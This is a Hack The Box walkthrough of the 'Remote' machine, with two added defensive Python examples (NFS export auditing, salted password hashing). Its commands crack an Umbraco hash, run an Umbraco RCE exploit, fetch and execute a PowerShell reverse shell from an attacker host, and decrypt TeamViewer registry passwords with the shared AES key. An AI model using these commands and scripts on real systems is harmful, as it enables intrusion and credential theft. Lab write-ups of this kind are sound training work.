REMOTE HTB WRITE UP | WALKTHROUGH

MEFIRE FILS ASSAN
Published in System Weakness
6 min read · Feb 5, 2024

Remote is a good HTB machine for learning about the dangers of publicly sharing files on a network and of running outdated software. In this article, I will show you the methods I used to pwn this machine.

RECONNAISSANCE

Before starting, we need to gather some information about the VICTIM machine, and one of the best ways to do that is an nmap scan

nmap -sC -sV -O TARGET_IP

Here is the output of the scan

Many ports are open. First, we can note port 21, which allows anonymous login, and port 80, which means there is a website running on the target machine

FTP ANONYMOUS LOGIN

Anonymous login means that we can log into the FTP server with the username anonymous and no password.

Once connected, use “ls” to list all the files available on the server

Nothing, what a disappointment 😓. But don’t give up; let’s try something else

MOUNTD SHARED FILES

Look at the last open port, 2049, which is running the mountd service. This means the TARGET machine is sharing files over NFS, and we can mount them on our local machine.
First, we use the following command

showmount -e TARGET_IP

showmount lists all the directories exported by the victim that anyone on the network can mount on their local machine.

As you can see in the previous output, there is a /site_backups folder that we can mount with the following command

sudo mount -t nfs TARGET_IP:/site_backups victim

The shared folder will be mounted inside the victim folder I created.
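The root cause here is an NFS export that any host on the network may mount. As an added example (not from the original write-up), the Python below parses a constructed /etc/exports file and a constructed showmount -e listing and flags the settings a defender should tighten: exports to every host (*), wildcard hostnames, world-writable exports and no_root_squash. The sample lines, the finding codes and the function names are all assumptions made for this example.

```python
import re

# Constructed sample /etc/exports (not taken from the target): the first line is the kind
# of export that lets any host on the network mount /site_backups, as in the write-up.
SAMPLE_EXPORTS = """\
# NFS exports
/site_backups   *(rw,sync,no_root_squash)
/srv/backups    10.10.14.0/24(ro,sync,root_squash)
/home/shared    *.htb.local(rw,no_subtree_check)
"""

# Constructed sample of `showmount -e` output for the same server.
SAMPLE_SHOWMOUNT = """\
Export list for TARGET_IP:
/site_backups (everyone)
/srv/backups  10.10.14.0/24
"""

def parse_exports(text):
    """Yield (path, client, [options]) for every client spec on every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if m is None:
                continue                          # malformed spec, skip it
            client = m.group(1) or "*"            # "(opts)" with no host means everyone
            opts = m.group(2).split(",") if m.group(2) else []
            yield path, client, opts

def audit_exports(text):
    """Return (path, client, issue) findings for exports a defender should tighten."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "any-host"))
            if "rw" in opts:                      # exports default to read-only
                findings.append((path, client, "world-writable"))
        elif "*" in client:
            findings.append((path, client, "wildcard-host"))
        if "no_root_squash" in opts:              # remote root keeps root on the export
            findings.append((path, client, "no_root_squash"))
    return findings

def exports_open_to_everyone(showmount_text):
    """Paths that `showmount -e` reports as mountable by (everyone)."""
    return [line.split()[0] for line in showmount_text.splitlines()
            if line.rstrip().endswith("(everyone)")]

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("exports:", *finding)
    print("open to everyone:", exports_open_to_everyone(SAMPLE_SHOWMOUNT))
```

The fix on the server side is to replace the * client with the specific hosts or subnet that need the share, keep root_squash, and export read-only unless writes are required; running exports_open_to_everyone over the real showmount -e output is a quick way to confirm the change took effect.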

It looks like a backup of the CMS used by the website hosted on the target machine (remember that port 80 is open).

A little research on the internet shows that Umbraco CMS stores credentials in a file named Umbraco.sdf inside the App_Data directory.

Open it with any editor you want (I use nano).

We can see (underlined) the username, the password hash and the hashing algorithm used. We will use John the Ripper to crack the hash with this command

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash.txt

hash.txt is the file into which I pasted the password hash. After that, you can use the following command to display the cracked password

john --show hash.txt
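The reason a wordlist attack works here is that the stored hash is unsalted SHA-1: the same password always produces the same digest, so one precomputed table serves every user. As an added example (not part of the original write-up), the Python below shows that deterministic lookup beside the hardened alternative, a random per-user salt with PBKDF2 from the standard library. The sample password and the function names are assumptions made for this example; the digest is constructed, not taken from the target.

```python
import hashlib
import hmac
import os

# Constructed sample: an unsalted SHA-1 digest of a weak password, the kind of hash the
# write-up pulls from Umbraco.sdf and feeds to john. The password here is made up.
LEGACY_SHA1 = hashlib.sha1(b"Winter2024").hexdigest()

def unsalted_sha1_lookup(target_hex, candidates):
    """Unsalted SHA-1 is deterministic: one table of digests serves every user and every
    site, so a hash whose password appears in the wordlist is recovered instantly."""
    table = {c: hashlib.sha1(c.encode()).hexdigest() for c in candidates}
    for candidate, digest in table.items():
        if hmac.compare_digest(digest, target_hex):
            return candidate
    return None

def pbkdf2_record(password, iterations=600_000):
    """Hardened storage: a random 16-byte salt per user and a slow key-derivation function."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "digest": digest.hex()}

def pbkdf2_verify(record, password):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(digest.hex(), record["digest"])

def same_password_same_digest(password, iterations=600_000):
    """False for salted storage: two users with the same password get different digests,
    so a precomputed table cannot be reused the way it can against raw SHA-1."""
    first = pbkdf2_record(password, iterations)["digest"]
    second = pbkdf2_record(password, iterations)["digest"]
    return first == second

if __name__ == "__main__":
    print("legacy lookup:", unsalted_sha1_lookup(LEGACY_SHA1, ["admin", "Winter2024"]))
    record = pbkdf2_record("Winter2024")
    print("pbkdf2 verify:", pbkdf2_verify(record, "Winter2024"))
    print("salted digests collide:", same_password_same_digest("Winter2024"))
```

The iteration count is deliberately high so that each guess costs real CPU time; when migrating an application off raw SHA-1, rehash each user's password on their next successful login rather than trying to convert the old digests, which is impossible without the plaintext.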

Now that we have credentials, we need to find a way into the admin panel via this link http://TARGET_IP/umbraco

Once logged in, we can go to the help panel to see the Umbraco version

We use the searchsploit command to find known exploits for this version

The exploit can be used like this

python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u username -p password -i 'http://TARGET_IP' -c 'command'

As you can see in the screenshot below, we can use it with the credentials we gathered to execute the whoami command

The next step is to use this vulnerability to get a shell

Windows reverse shell

Usually, to get a reverse shell between two machines, we use the netcat utility, but it is not installed by default on Windows. So we will use a PowerShell script that connects the Windows shell back to our attack box.
We first download it to our attack box with wget (using the raw file URL rather than the GitHub page, which wget would otherwise save as HTML)

wget https://raw.githubusercontent.com/martinsohn/PowerShell-reverse-shell/main/powershell-reverse-shell.ps1

Update the script with the attack box IP address and the port that the netcat listener will use

Start a simple HTTP server on the attack box; the victim machine will download the script from it

Run a netcat listener, because the next command downloads the PowerShell script and executes it immediately:

nc -lvnp PORT

The following command downloads and executes the PowerShell script, which connects back to our netcat listener.

python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u admin@htb.local -p baconandcheese -i 'http://TARGET_IP' -c powershell.exe -a 'IEX(IWR http://ATTACK_BOX_IP:8000/powershell-reverse-shell.ps1 -UseBasicParsing); powershell-reverse-shell ATTACK_BOX_IP PORT'

Back on our netcat listener, we are connected

Once connected, you can easily get the flag

Privilege escalation

We are connected as an unprivileged user, but we can use this access to gain more privileges.
Take a look at the files inside C:\Users\Public\Desktop

There is a shortcut to the software TeamViewer version 7. To verify that, we check for a non-default running service launched by TeamViewer with this command

tasklist /svc

As you can see in the output, TeamViewer7 is running

I simply searched for “TeamViewer vulnerability” and found this: https://www.cvedetails.com/cve/CVE-2019-18988/. This vulnerability can be used to decrypt stored passwords, including system login passwords such as the administrator password.

A brief note on the vulnerability: TeamViewer versions 7 to 14.8 store passwords in a registry key encrypted with AES, but every installation uses the same key. Anyone who has that key can easily decrypt an admin password on a local machine.

Manual exploit

Once connected, we can print the values of the registry key with this command

reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7

As you can see in the output, the password for remote access to the machine is stored encrypted with AES

We will use this small Python script from this site: https://web.archive.org/web/20200203175441/https://whynotsecurity.com/blog/teamviewer/, to decrypt the password.

import sys, hexdump, binascii   # hexdump and pycryptodome are third-party: pip install hexdump pycryptodome
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # AES-CBC with the key and IV that every TeamViewer installation shares
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "PASTE THE CIPHER PASSWORD HERE"  # output from the registry

ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)

hexdump.hexdump(raw_un)  # prints the decrypted bytes (hexdump.hexdump prints and returns None)

password = raw_un.decode('utf-16')  # the stored password is UTF-16 encoded
print(password)

Don’t forget to replace the placeholder in the code with the encrypted value from the registry.
Then run the Python script and you get the password in clear text

Now connect through the psexec.py utility

psexec.py Administrator@TARGET_IP

And we can easily get the flag

